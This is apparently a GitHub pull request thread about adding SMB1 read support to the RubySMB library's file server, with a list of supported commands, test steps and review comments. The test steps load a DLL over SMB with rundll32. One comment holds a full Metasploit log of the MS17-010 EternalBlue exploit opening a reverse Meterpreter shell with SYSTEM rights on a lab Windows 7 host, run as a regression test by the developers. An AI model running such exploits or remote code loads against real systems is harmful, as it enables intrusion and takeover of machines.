Read-only SMB 1 File Server

[zeroSteiner]

This expands on the work started in #181. It adds SMB 1 protocol support but only for the latest NT LM 0.12 dialect to the SMB file server with sufficient capabilities for reading files.

There were no major architectural changes to comment on this time around.

Supported Features

The following is a combined list of capabilities implemented by this implementation, and the implementation currently offered by the Metasploit Framework which this will hopefully replace in the near future.

SMB1 Commands:

• SMB_COM_NEGOTIATE

• SMB_COM_SESSION_SETUP_ANDX

• SMB_COM_TREE_CONNECT (RubySMB only)

• SMB_COM_TRANSACTION2

  Subcommands supported:

  • FIND_FIRST2

    Level of interest supported:

    • FIND_FILE_NAMES_INFO (Metasploit only[^1])
    • FIND_FILE_BOTH_DIRECTORY_INFO (Metasploit only[^1])
    • FIND_FILE_FULL_DIRECTORY_INFO

  • QUERY_FILE_INFORMATION

    Level of Interests supported:

    • QUERY_FILE_STANDARD_INFO
    • QUERY_FILE_BASIC_INFO

  • QUERY_PATH_INFORMATION

    Level of Interests supported:

    • QUERY_FILE_STANDARD_INFO
    • QUERY_FILE_BASIC_INFO
    • QUERY_FILE_NETWORK_OPEN_INFO (Metasploit only[^1])

• SMB_COM_NT_CREATE_ANDX

• SMB_COM_READ_ANDX

• SMB_COM_CLOSE

• SMB_COM_TREE_DISCONNECT (RubySMB only)

• SMB_COM_LOGOFF (RubySMB only)

Next Steps

Taken from the original work in #181 but prioritized

• Add file support for SMB 1 so this server can handle all the versions
• Add a VirtualDisk share provider that can serve up files that exist only in memory
• Add and test support for working with encrypted shares
• Add remaining info classes to the QUERY_INFO and QUERY_DIRECTORY handlers to work with Linux, mounting the drive, etc.
• Move the file server example into the actual library so that consumers of the gem can start a quick server (like from Metasploit's tools/ maybe?)

Tested Scenarios

Start a test server using the existing examples/file_server.rb tool. Disable both SMBv2 and SMBv3 with their respective flags.

ruby examples/file_server.rb \
  --path /var/public \
  --share public \
  --username MSFLAB\smcintyre \
  --password Password1! \
  --no-smbv2 \
  --no-smbv3

• Windows Server 2019
  • Reading a file via type \\192.168.159.128\public\test.txt
  • Copying a file via copy \\192.168.159.128\public\test.txt .
  • Loading executable code via rundll32 \\192.168.159.128\public\cmd.x64.dll,main
• Windows 7
  • Reading a file via type \\192.168.159.128\public\test.txt
  • Copying a file via copy \\192.168.159.128\public\test.txt .
  • Loading executable code via rundll32 \\192.168.159.128\public\cmd.x64.dll,main
• RubySMB
  • Reading a file via ruby examples/read_file.rb --no-smbv2 --no-smbv3 --username MSFLAB\\smcintyre --password Password1\! 192.168.159.128 Public test.txt

See [How to detect, enable and disable SMBv1, SMBv2, and SMBv3 in Windows][1] for steps on detectiong and changing SMB version support in Windows.

Testing Steps

• [ ] Start the server using the same steps from the Tested Scenarios section above
• [ ] Test copying a file from the remote server (copying operations trigger additional queries for metadata)
• [ ] Read a file from the remote server
• [ ] Load an executable DLL from the remote server (this the most similar to what will likely be the earliest real use cases for Metasploit).
• [ ] Ensure that the unit tests all pass
• [ ] Test the MS17-010 exploit from Metasploit to ensure the Trans2 definition changes don't break it

[^1]: To best close these feature gaps, examples of scenarios in which they are used would be necessary.

[zeroSteiner]

Tested the MS17-010 exploit successfully to make sure the Trans2 changes were in fact backwards compatible.

Testing Output

``` msf6 exploit(windows/smb/ms17_010_eternalblue) > versions Framework: 6.1.35-dev-ff7b017e14 Library Versions ================ Library Version ------- ------- Dnsruby 1.61.9 MetasploitPayloads 2.0.77 MetasploitPayloads::Mettle 1.0.18 Net::SSH 0.1.14 Rex::MIME 0.1.7 RubySMB 3.0.6 msf6 exploit(windows/smb/ms17_010_eternalblue) > run [*] Started reverse TCP handler on 192.168.250.134:4444 [*] 192.168.159.11:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 192.168.159.11:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit) [*] 192.168.159.11:445 - Scanned 1 of 1 hosts (100% complete) [+] 192.168.159.11:445 - The target is vulnerable. [*] 192.168.159.11:445 - Connecting to target for exploitation. [+] 192.168.159.11:445 - Connection established for exploitation. [+] 192.168.159.11:445 - Target OS selected valid for OS indicated by SMB reply [*] 192.168.159.11:445 - CORE raw buffer dump (42 bytes) [*] 192.168.159.11:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes [*] 192.168.159.11:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv [*] 192.168.159.11:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1 [+] 192.168.159.11:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 192.168.159.11:445 - Trying exploit with 12 Groom Allocations. [*] 192.168.159.11:445 - Sending all but last fragment of exploit packet [*] 192.168.159.11:445 - Starting non-paged pool grooming [+] 192.168.159.11:445 - Sending SMBv2 buffers [+] 192.168.159.11:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 192.168.159.11:445 - Sending final SMBv2 buffers. [*] 192.168.159.11:445 - Sending last fragment of exploit packet! [*] 192.168.159.11:445 - Receiving response from exploit packet [+] 192.168.159.11:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 192.168.159.11:445 - Sending egg to corrupted connection. [*] 192.168.159.11:445 - Triggering free of corrupted buffer. [*] Sending stage (200262 bytes) to 192.168.250.237 [+] 192.168.159.11:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.159.11:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.159.11:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [*] Meterpreter session 1 opened (192.168.250.134:4444 -> 192.168.250.237:58395 ) at 2022-03-21 12:17:18 -0400 meterpreter > sysinfo gComputer : WIN-9NSI4A6AIHJ OS : Windows 7 (6.1 Build 7601, Service Pack 1). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > ```

[zeroSteiner]

I found that listing directory with pushd requires SMB_FIND_FILE_BOTH_DIRECTORY_INFO find information level structure and it is not supported

I'll add SMB_FIND_FILE_BOTH_DIRECTORY_INFO support since Metasploit already has it so it's a feature gap with the existing implementation.

Finally, I would suggest to set the default domain value to an empty string instead of WORKSTATION in RubySMB::Gss::Provider::NTLM. This will accept a local user out-of-the-box. Without this, the user will need to be part of the WORKSTATION domain, which is not really a domain.

Would you mind submitting a PR for this if you'd like to see it changed? It's a bit off topic for here but I did try to change it from WORKSTATION to an empty string and it didn't appear to change anything for me so I'm not sure the intention and don't really want to dig into it here.

smbclient version 4.3.11 and 4.7.6 sound like they're both failing before the session is established and the user is fully authenticated. That could be a pre-existing issue. Would you mind testing against master and seeing if you can reproduce them? If so it may make sense to track them in another ticket, otherwise I can dig into fixing it here.

[cdelafuente-r7]

I could reproduce the issue against master for both versions. Also, for 4.3.11, there was a typo in my comment: the error actually appears as soon as the NTLMSSP_CHALLENGE Session Setup packet is received by the client. Anyway, I'll create a ticket for this. Thanks!

[cdelafuente-r7]

Thanks! Everything looks good to me now. I'll create tickets to keep track of some issues highlighted in this PR and land it.